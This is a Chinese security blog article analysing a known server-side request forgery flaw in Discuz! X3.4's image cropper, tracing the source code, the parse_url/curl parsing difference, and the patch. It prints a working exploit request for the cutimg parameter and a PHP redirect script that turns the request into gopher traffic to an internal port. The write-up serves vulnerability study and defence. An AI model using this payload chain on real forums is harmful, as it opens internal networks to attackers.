freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

实例分析 DiscuzX 3.4 SSRF漏洞
  • 关注
实例分析 DiscuzX 3.4 SSRF漏洞
2021-09-26 17:44:51

0x00 漏洞信息简介

Crossday Discuz! Board(简称 Discuz!)是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。目前最新版本Discuz! X3.4正式版于2017年8月2日发布,去除了云平台的相关代码,是 X3.2 的稳定版本。此次漏洞位于/source/module/misc/misc_imgcropper.php中的54行处的$prefix可控导致SSRF。
文章参考Discuz x3.4 前台 SSRF 分析。该漏洞公开时间为2018年12月3日,文章地址为Discuz x3.4前台SSRF,由于该文章存在密码,可以查看转载地址:文章转载地址

0x01 漏洞详细分析

Discuz开源地址为Gitee,使用git clone 克隆到本地

git clone https://gitee.com/Discuz/DiscuzX

根据补丁提交记录来切换到漏洞修复前的前一个commit版本

git checkout a5c1b95dc4464ee3da0ebd4655d30867f85d6ae9

本地搭建好运行环境之后首先访问页面http://www.a.com/dz/DiscuzX/upload/misc.php?mod=imgcropper,然后点击裁切按钮并抓包

image.png

拦截之后重放数据包在提交内容位置添加参数cutimgpicflag,红框处填写需要请求的IP地址并发送数据包

&cutimg=/dz/DiscuzX/upload/member.php%3fmod%3dlogging%26action%3dlogout%26referer%3d//c%2523%2540192.168.163.131%26quickforward%3d1&picflag=2

image.png

这时服务器将成功收到请求

image.png

下面来看看后端是怎么处理的,断点地址为source/module/misc/misc_imgcropper.phpline 54。当传递的picflag2时取$_G['setting']['ftp']['attachurl']变量的值"/"。接下来55行接收拼接可控变量cutimg

image.png

既然可控,那么就要看看它后面是怎么处理的,来到Thumb方法

image.png

进入init方法,到达parse_url方法后在source中解析出了host。此时就会进入dfsockopen

//dz/DiscuzX/upload/member.php?mod=logging&action=logout&referer=//c%23%40192.168.163.131&quickforward=1

image.png

parse_url支持//baidu.com/s这种形式的url解析

image.png

继续跟进dfsockopen方法,在该方法中又进行了解析,处理同上,由于不存在协议所以schemenull,这样在最后拼接出来的URL就是://xx.com/,这样的链接会自动补上协议,所以最后为http://://xx.com/

image.png

在windows中使用curl请求该地址最终解析到了192.168.163.1,也就是某个网卡的本地地址。请求路径为http://192.168.163.1/xx.com

image.png

此时我们能够进行内网请求,但是地址并不可控,所以需要找到一个discuz可以进行任意url跳转的漏洞,再请求该路径跳转出去。discuz在退出的时候会取get参数referer中的值来进行跳转,下面来分析跳转处的代码。

function dreferer($default = '') {
	global $_G;

	$default = empty($default) && $_ENV['curapp'] ? $_ENV['curapp'].'.php' : '';
	//获取$_GET['referer']参数
	$_G['referer'] = !empty($_GET['referer']) ? $_GET['referer'] : $_SERVER['HTTP_REFERER'];
	$_G['referer'] = substr($_G['referer'], -1) == '?' ? substr($_G['referer'], 0, -1) : $_G['referer'];

	if(strpos($_G['referer'], 'member.php?mod=logging')) {
		$_G['referer'] = $default;
	}

	$reurl = parse_url($_G['referer']);
    //如果存在协议则判断是否为http和https,不存在则不判断
	if(!$reurl || (isset($reurl['scheme']) && !in_array(strtolower($reurl['scheme']), array('http', 'https')))) {
		$_G['referer'] = '';
	}

	if( !empty($reurl['host']) &&
        //判断解析的host是否为$_SERVER['HTTP_HOST']
        !in_array($reurl['host'], array($_SERVER['HTTP_HOST'], 'www.'.$_SERVER['HTTP_HOST'])) &&
        //判断$_SERVER['HTTP_HOST']是否存在于解析出的host中
        !in_array($_SERVER['HTTP_HOST'], array($reurl['host'], 'www.'.$reurl['host']))) {
		if(!in_array($reurl['host'], $_G['setting']['domain']['app']) &&
            !isset($_G['setting']['domain']['list'][$reurl['host']])) {
		    //截取解析的host第一个.后面的所有内容,没有.则当长度为1时则返回为空
			$domainroot = substr($reurl['host'], strpos($reurl['host'], '.')+1);
			//$_G['setting']['domain']['root']为array且为空
			if(empty($_G['setting']['domain']['root']) ||
                (is_array($_G['setting']['domain']['root']) &&
                    //想要不进入这个判断需要保证$domainroot为空,这样referer才不会被覆盖,才能实现任意地址跳转
                    !in_array($domainroot, $_G['setting']['domain']['root']))) {
				$_G['referer'] = $_G['setting']['domain']['defaultindex'] ? $_G['setting']['domain']['defaultindex'] : 'index.php';
			}
		}
	} elseif(empty($reurl['host'])) {
		$_G['referer'] = $_G['siteurl'].'./'.$_G['referer'];
	}

	$_G['referer'] = durlencode($_G['referer']);
	return $_G['referer'];
}

在上面的代码中只要我们做到$_G['referer']不被覆盖即可,首先解析的host中存在协议则判断是否为httphttps,不存在则不判断,所以我们可以不传入协议。第二处判断解析的host是否为$_SERVER['HTTP_HOST'],如果是则不进入if覆盖$_G['referer']。但是这样的话在实际的ssrf跳转场景中$_SERVER['HTTP_HOST']为空。

image.png

所以这个条件无法生效。后面的一个关键判断$domainroot = substr($reurl['host'], strpos($reurl['host'], '.')+1);会截取解析的host第一个.后面的所有内容,没有.并且当长度为1时则返回为空。返回为空时后面的!in_array($domainroot, $_G['setting']['domain']['root']))这个条件就为false。也就不会进入if判断覆盖$_G['referer']了。但是这儿存在一个问题,如果我们host为a那么最后通过curl跳转的时候就往a跳转了。不能指定任意地址。此时可以利用parse_urlcurl的解析差异来绕过这个限制。构造//a#@1.1.1.1,那么parse_url将解析hosta,而curl解析host为1.1.1.1。所以就得到了构造的完整url。

image.png

0x02 漏洞利用手段

最后的利用流程为:
ssrf访问本地接口进行URL跳转

====301====>

跳转到目标服务器,服务器上使用跳转脚本进行协议转换或者任意路径访问

=====302=====>

通过指定协议如gopher,访问指定路径/_test...等

首先通过服务器搭建跳转脚本index.php

<?php
header("Location: gopher://127.0.0.1:2333/_test");
?>

本地进行nc监听

image.png

ssrf跳转服务器地址

image.png

成功将请求转发到本地发送test消息

image.png

0x03 漏洞修复方法

官方在补丁提交记录[2]的版本提交中对漏洞进行了修复,修复方式为重写了dfsockopen中调用的parse_url_parse_url,在该方法中判断了parse_url是否能够解析出协议,无法解析则退出。

image.png

image.png

0x04 漏洞思考总结

这个漏洞的成功利用离不开对parse_url解析特性的了解,parse_url成功从cutimg变量中解析出host,才能调用dfsockopen方法,在该方法中使用curl请求拼接了前缀的地址://xx.com。这将请求本地地址,通过寻找discuz的url跳转来将本地请求转发出去。而在url跳转的利用中使用到了parse_urlcurl//a#@1.1.1.1的解析差异来完成任意地址访问。最后在访问地址使用302跳转来达到使用指定协议请求指定路径或发送数据的目的。

# Discuz # SSRF # 漏洞分析 # 代码审计
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录
0x00 漏洞信息简介
    0x01 漏洞详细分析
      0x02 漏洞利用手段
        0x03 漏洞修复方法
          0x04 漏洞思考总结